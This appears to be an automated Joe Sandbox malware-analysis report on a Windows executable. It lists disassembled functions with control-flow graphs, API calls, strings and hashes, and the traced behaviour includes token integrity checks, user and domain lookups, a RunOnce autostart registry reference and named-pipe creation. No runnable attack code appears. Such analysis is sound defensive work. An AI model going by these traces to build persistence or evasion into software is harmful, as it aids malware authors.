                                                    control_flow_graph 1666 4927f0-492848 call 35ab90 1669 4939de-493a5e call 35a850 1666->1669 1670 49284e-49286e call 35ab90 1666->1670 1675 493a6e-493a8c 1669->1675 1676 493a60-493a67 CloseHandle 1669->1676 1670->1669 1680 492874-4929e7 call 35ab90 1670->1680 1678 493a8e-493a91 1675->1678 1679 493a96-493ab3 call 456ea0 1675->1679 1676->1675 1678->1679 1680->1669 1687 4929ed-492a37 1680->1687 1689 4935cb-493611 call 4b1610 1687->1689 1690 492a3d-492aa5 call 51fea9 call 5221f0 call 4b03a0 call 35ab90 1687->1690 1694 493616-49361e 1689->1694 1690->1669 1725 492aab-492b9f 1690->1725 1696 4937b5-4937cb 1694->1696 1697 493624-493633 1694->1697 1701 4937cd-4937e3 CloseHandle 1696->1701 1702 4937e5-4937e8 1696->1702 1699 493639-49363b 1697->1699 1700 4937ab 1697->1700 1704 49363d-493651 CreateEventW 1699->1704 1705 493672-4936a9 CreateThread 1699->1705 1700->1696 1706 4937ee-493804 1701->1706 1702->1706 1708 49366a-49366d 1704->1708 1709 493653-493664 1704->1709 1710 4936ab-4936ad 1705->1710 1711 4936b2-4936cb WaitForSingleObject GetExitCodeThread 1705->1711 1712 493813-49383a 1706->1712 1713 493806-493809 CloseHandle 1706->1713 1708->1705 1709->1708 1710->1711 1716 4936d1-4936ed 1711->1716 1717 493787-493797 1711->1717 1714 49383c-49383f 1712->1714 1715 493844-493869 call 456ea0 1712->1715 1713->1712 1714->1715 1727 49392a-493936 1715->1727 1728 49386f 1715->1728 1716->1696 1719 4936f3-493705 1716->1719 1717->1700 1721 493799-4937a1 1717->1721 1719->1696 1721->1700 1736 4939cf-4939d9 call 35a850 call 5252ff 1725->1736 1746 492ba5-492ba7 1725->1746 1730 493938-493941 call 529d16 1727->1730 1731 49394b-493976 1727->1731 1732 493870-493872 1728->1732 1730->1731 1737 493978-49397b 1731->1737 1738 493980-493998 1731->1738 1735 493878-49387a 1732->1735 1732->1736 1735->1736 1742 493880-493891 1735->1742 1736->1669 1737->1738 1743 49399a-49399d 1738->1743 1744 4939a2-4939c2 call 51fe6a 1738->1744 1749 49391a-493921 1742->1749 1750 493897-4938bb 1742->1750 1743->1744 1746->1736 1751 492bad-492bd5 call 35ab90 1746->1751 1749->1732 1753 493927 1749->1753 1755 4938bd-4938c0 1750->1755 1756 4938c5-4938f3 call 4b05c0 1750->1756 1751->1669 1763 492bdb-492df3 1751->1763 1753->1727 1755->1756 1761 4938f5-4938fc CloseHandle 1756->1761 1762 493906-493917 call 51fe78 1756->1762 1761->1762 1762->1749 1763->1736 1768 492df9-492e00 1763->1768 1768->1736 1769 492e06-492e12 1768->1769 1769->1736 1770 492e18-492ec4 call 461d50 call 371a90 1769->1770 1770->1736 1778 492eca-492ed1 1770->1778 1778->1736 1779 492ed7-492edd 1778->1779 1779->1736 1780 492ee3-492f03 1779->1780 1781 492f06-492f0f 1780->1781 1781->1781 1782 492f11-493426 call 358190 call 357690 call 45ed90 call 45f600 call 45eab0 call 453940 call 35a380 call 5221f0 FindFirstFileW 1781->1782 1782->1689
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • CloseHandle.KERNEL32(?,D13B3340,?,76B7FB40), ref: 00493A61
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$CloseHandleHeapProcess
                                                    • String ID: <3[$<3[$<3[$<3[$<3[
                                                    • API String ID: 2534622057-2247405043
                                                    • Opcode ID: fc5a52d16b7bfa167f24cc580a2adac33d204892cda2eda906712b066c7c687e
                                                    • Instruction ID: da80b2b949335a3a4acc5da610ea5b4048bb66a897e9f3b85ba26c66c21ddde3
                                                    • Opcode Fuzzy Hash: fc5a52d16b7bfa167f24cc580a2adac33d204892cda2eda906712b066c7c687e
                                                    • Instruction Fuzzy Hash: 69526B709016589BDB26CF68C944B9ABBF8AF05305F1481EEE408AB291DB789F84CF54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046E790 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1811 46e790-46e7ed GetCurrentProcess OpenProcessToken 1813 46e7ef-46e7f7 GetLastError 1811->1813 1814 46e7fc-46e81d GetTokenInformation 1811->1814 1815 46e8ba-46e8cd 1813->1815 1816 46e81f-46e828 GetLastError 1814->1816 1817 46e84b-46e84f 1814->1817 1818 46e8cf-46e8d6 FindCloseChangeNotification 1815->1818 1819 46e8dd-46e8f9 call 51fe6a 1815->1819 1820 46e89e GetLastError 1816->1820 1821 46e82a-46e849 call 46f280 GetTokenInformation 1816->1821 1817->1820 1822 46e851-46e880 AllocateAndInitializeSid 1817->1822 1818->1819 1823 46e8a4 1820->1823 1821->1817 1821->1820 1822->1823 1824 46e882-46e89c EqualSid FreeSid 1822->1824 1827 46e8a6-46e8b3 call 520528 1823->1827 1824->1827 1827->1815
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0046E7D8
                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0046E7E5
                                                    • GetLastError.KERNEL32 ref: 0046E7EF
                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,000000FF), ref: 0046E819
                                                    • GetLastError.KERNEL32 ref: 0046E81F
                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),000000FF,000000FF,000000FF,000000FF), ref: 0046E845
                                                    • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0046E878
                                                    • EqualSid.ADVAPI32(00000000,?), ref: 0046E887
                                                    • FreeSid.ADVAPI32(?), ref: 0046E896
                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0046E8D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
                                                    • String ID: <3[
                                                    • API String ID: 2037597787-3672254634
                                                    • Opcode ID: 98b12e3fa9e9e89a7924cad45ceb80b6c2296f5b8e862b80f2ef3b9b219eb994
                                                    • Instruction ID: 42ff0739cfbdc08f4b1e2d6d1a5c0010d58dda76eb03289b33f443c975a5afae
                                                    • Opcode Fuzzy Hash: 98b12e3fa9e9e89a7924cad45ceb80b6c2296f5b8e862b80f2ef3b9b219eb994
                                                    • Instruction Fuzzy Hash: 14413775900209AFDF109FA5CC48BEEBBF9FF09314F144015E511B3290EB799A08DBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004AAC30 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 529registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1832 4aac30-4aacc9 GetUserNameW 1833 4aaccb-4aacd4 GetLastError 1832->1833 1834 4aad15-4aad53 GetEnvironmentVariableW 1832->1834 1833->1834 1835 4aacd6-4aacde 1833->1835 1836 4aad99-4aadcc 1834->1836 1837 4aad55-4aad5a 1834->1837 1838 4aace0-4aacf4 1835->1838 1839 4aacf6-4aacfe call 35ee10 1835->1839 1842 4aadce-4aade1 1836->1842 1843 4aade3-4aadeb call 358190 1836->1843 1840 4aad5c-4aad70 1837->1840 1841 4aad72-4aad7c call 35ee10 1837->1841 1844 4aad03-4aad13 GetUserNameW 1838->1844 1839->1844 1846 4aad81-4aad93 GetEnvironmentVariableW 1840->1846 1841->1846 1848 4aadf0-4aae25 call 358060 * 2 1842->1848 1843->1848 1844->1834 1846->1836 1854 4aae59-4aae76 1848->1854 1855 4aae27-4aae39 1848->1855 1858 4aae78-4aae8a 1854->1858 1859 4aaea6-4aaed9 call 51fe6a 1854->1859 1856 4aae3b-4aae49 1855->1856 1857 4aae4f-4aae56 call 51fe78 1855->1857 1856->1857 1861 4aaeda-4aaf61 call 5252ff call 4ab380 call 46a1c0 call 358810 1856->1861 1857->1854 1863 4aae9c-4aaea3 call 51fe78 1858->1863 1864 4aae8c-4aae9a 1858->1864 1877 4aaf8c-4aaf92 1861->1877 1878 4aaf63-4aaf89 call 458330 1861->1878 1863->1859 1864->1861 1864->1863 1880 4aaf96-4aafc5 call 358810 * 2 1877->1880 1881 4aaf94 1877->1881 1878->1877 1888 4aafc7-4aafce RegCloseKey 1880->1888 1889 4aafd5-4ab048 call 358190 call 46a1c0 1880->1889 1881->1880 1888->1889 1894 4ab04a-4ab05c 1889->1894 1895 4ab07c-4ab093 1889->1895 1898 4ab05e-4ab06c 1894->1898 1899 4ab072-4ab079 call 51fe78 1894->1899 1896 4ab0bb-4ab120 call 4ab530 call 46a1c0 1895->1896 1897 4ab095-4ab0b6 call 458330 1895->1897 1913 4ab16c-4ab196 call 358810 * 2 1896->1913 1914 4ab122-4ab14c call 358810 * 2 1896->1914 1897->1896 1898->1899 1903 4ab372 call 5252ff 1898->1903 1899->1895 1907 4ab377-4ab37f call 5252ff 1903->1907 1925 4ab1aa-4ab1b8 1913->1925 1926 4ab198-4ab1a0 1913->1926 1923 4ab14e-4ab156 1914->1923 1924 4ab160-4ab16a 1914->1924 1923->1924 1927 4ab1c6-4ab1ff call 358810 * 3 1924->1927 1928 4ab1ba 1925->1928 1929 4ab1bc-4ab1bd 1925->1929 1926->1925 1938 4ab20b-4ab25f call 358190 call 46a1c0 1927->1938 1939 4ab201-4ab204 RegCloseKey 1927->1939 1928->1929 1929->1927 1944 4ab293-4ab2af 1938->1944 1945 4ab261-4ab273 1938->1945 1939->1938 1946 4ab2ec-4ab2f0 1944->1946 1947 4ab2b1-4ab2e6 call 458330 1944->1947 1948 4ab289-4ab290 call 51fe78 1945->1948 1949 4ab275-4ab283 1945->1949 1952 4ab2f2 1946->1952 1953 4ab2f4-4ab335 call 358810 * 2 1946->1953 1947->1946 1948->1944 1949->1907 1949->1948 1952->1953 1961 4ab337-4ab33a RegCloseKey 1953->1961 1962 4ab344-4ab371 call 51fe6a 1953->1962 1961->1962
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 004AACC5
                                                    • GetLastError.KERNEL32 ref: 004AACCB
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 004AAD13
                                                    • GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 004AAD49
                                                    • GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 004AAD93
                                                    • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,D13B3340), ref: 004AAFC8
                                                    • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 004AB202
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 004AB338
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Close$EnvironmentNameUserVariable$ErrorLast
                                                    • String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain
                                                    • API String ID: 938064350-4079418357
                                                    • Opcode ID: 073b3bfe68c5eda5a602da8665ce063f3c1127d2189311b0c7b233f0176fee3c
                                                    • Instruction ID: c9d319ddfb8c2fbfb2fbf2383d5add1e5ca7276df2a932f345f50829d5978c68
                                                    • Opcode Fuzzy Hash: 073b3bfe68c5eda5a602da8665ce063f3c1127d2189311b0c7b233f0176fee3c
                                                    • Instruction Fuzzy Hash: E1226D70D00248DFDB14DFA8CD99BEEBBB5EF15304F208259E415B7291DB786A88CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051FA13 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00495F3E,?,?,?,?,?,?), ref: 0051FA18
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 0051FA1F
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0051FA65
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0051FA6C
                                                      • Part of subcall function 0051F8B1: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8D5
                                                      • Part of subcall function 0051F8B1: HeapAlloc.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Alloc$Free
                                                    • String ID: `{5
                                                    • API String ID: 1864747095-770602540
                                                    • Opcode ID: fe064b8df90578fe21a304791aa4c06884713a5f047621ef74cf36ee831b9411
                                                    • Instruction ID: cf105da142911b2752de2ccb7f03346f1ed5574e514bfaf405ba0bd55dec35b3
                                                    • Opcode Fuzzy Hash: fe064b8df90578fe21a304791aa4c06884713a5f047621ef74cf36ee831b9411
                                                    • Instruction Fuzzy Hash: 57F0E973A44B1297E7202B787C0CABB3DA5BFD1791B064538F54AC6250EF34D8866760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0049E1F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0049E2CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DiskFreeSpace
                                                    • String ID: \$\$\
                                                    • API String ID: 1705453755-3791832595
                                                    • Opcode ID: 2ef8875cbd88dad16717ac9397a1c18ff5b059e0715c5450f8a468c3b1925e59
                                                    • Instruction ID: 080cbf59a0f646f88ffee9a8fa672f3c0e694b736c2966157878bb163c18382a
                                                    • Opcode Fuzzy Hash: 2ef8875cbd88dad16717ac9397a1c18ff5b059e0715c5450f8a468c3b1925e59
                                                    • Instruction Fuzzy Hash: B941D462E14311C6CF30DF26C444AABBBE8FF95354F554A7FE8C893240E729998583CA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A630 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0042A671
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,0057CDED,000000FF), ref: 0042A744
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                    • String ID: UxTheme.dll
                                                    • API String ID: 2586271605-352951104
                                                    • Opcode ID: c382e29672fe28bc5858b2ef50a094f08d9b4f78795f3a98351029c7f80e3c54
                                                    • Instruction ID: 6981a994a7db3c34127491376069d68cb7627c8d54645f627b25cf610b2f6084
                                                    • Opcode Fuzzy Hash: c382e29672fe28bc5858b2ef50a094f08d9b4f78795f3a98351029c7f80e3c54
                                                    • Instruction Fuzzy Hash: A4A189B0600645EFE714CF64C818B9ABBF4FF04318F24865ED8199B781D7BAA618CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046C9A0 Relevance: 4.6, APIs: 3, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0046CA3D
                                                    • FindClose.KERNEL32(00000000), ref: 0046CA9C
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$AllocateCloseFileFirstHeap
                                                    • String ID:
                                                    • API String ID: 1673784098-0
                                                    • Opcode ID: 25a13dd7504da530a3e9dd4d7a122ca6e4579a77c6dbd1ee9738f2aea7c33eb9
                                                    • Instruction ID: 52bd5e839f1e789da4bc4293e30b9fa5014057b9afce039fe6e3cbe1955e0788
                                                    • Opcode Fuzzy Hash: 25a13dd7504da530a3e9dd4d7a122ca6e4579a77c6dbd1ee9738f2aea7c33eb9
                                                    • Instruction Fuzzy Hash: FE31C1709042189FDB24DF94C888BBAB7B4FF48324F20429ED95593380E7755944CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004AC2F0 Relevance: 3.1, APIs: 2, Instructions: 86filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,D13B3340,D13B3340,?,?,?,?,00000000), ref: 004AC379
                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,D13B3340,D13B3340,?,?,?,?,00000000,00594595), ref: 004AC39A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Create$FileNamedPipe
                                                    • String ID:
                                                    • API String ID: 1328467360-0
                                                    • Opcode ID: 6eb9ba16bd35e30fc697db0ab61cd187dabc05d793a94088f135e383fa739b05
                                                    • Instruction ID: fb0448f220d7766000ba4a089fd389e755a53453d07de23d42f59d7ccd5a2ce4
                                                    • Opcode Fuzzy Hash: 6eb9ba16bd35e30fc697db0ab61cd187dabc05d793a94088f135e383fa739b05
                                                    • Instruction Fuzzy Hash: FF310532A44745AFD720CF14CC05B9ABBA4EB11720F10C66EF9695B2D0DB75A900CB44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0038B0B0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __set_se_translator.LIBVCRUNTIME ref: 0038B0C8
                                                    • SetUnhandledExceptionFilter.KERNEL32(0046B960), ref: 0038B0DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled__set_se_translator
                                                    • String ID:
                                                    • API String ID: 2480343447-0
                                                    • Opcode ID: 75b93f11f9a8abca4a3824bd061b7d540a3ea794519aa75ef849d490e3cb6f97
                                                    • Instruction ID: a269fba4dce57f3072b7531e8e35b16a32e4842ea57f92f0e17c1fa69a42fe9d
                                                    • Opcode Fuzzy Hash: 75b93f11f9a8abca4a3824bd061b7d540a3ea794519aa75ef849d490e3cb6f97
                                                    • Instruction Fuzzy Hash: 62E02662A002007BD720A360AC49F5B7F64EBB2710F084456F600A32A1D7755485C7F3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B1D40 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$HeapProcess
                                                    • String ID: |^[
                                                    • API String ID: 275895251-2049683584
                                                    • Opcode ID: 47b413aca231a17ee57272af5451cd21dd0c59466a5dda8c6e2b0ddacf44ef8e
                                                    • Instruction ID: 3090e753e35a60bb762103edafb744d7e24953e0b82fdee3f81b4f67a568523f
                                                    • Opcode Fuzzy Hash: 47b413aca231a17ee57272af5451cd21dd0c59466a5dda8c6e2b0ddacf44ef8e
                                                    • Instruction Fuzzy Hash: 976138B0500B44CFD711CF69C55879ABFF4BF09308F108A5ED4899B391D7B9A509DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00471E40 Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 224registrylibraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00471EAE
                                                    • RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00471EF5
                                                    • RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00471F14
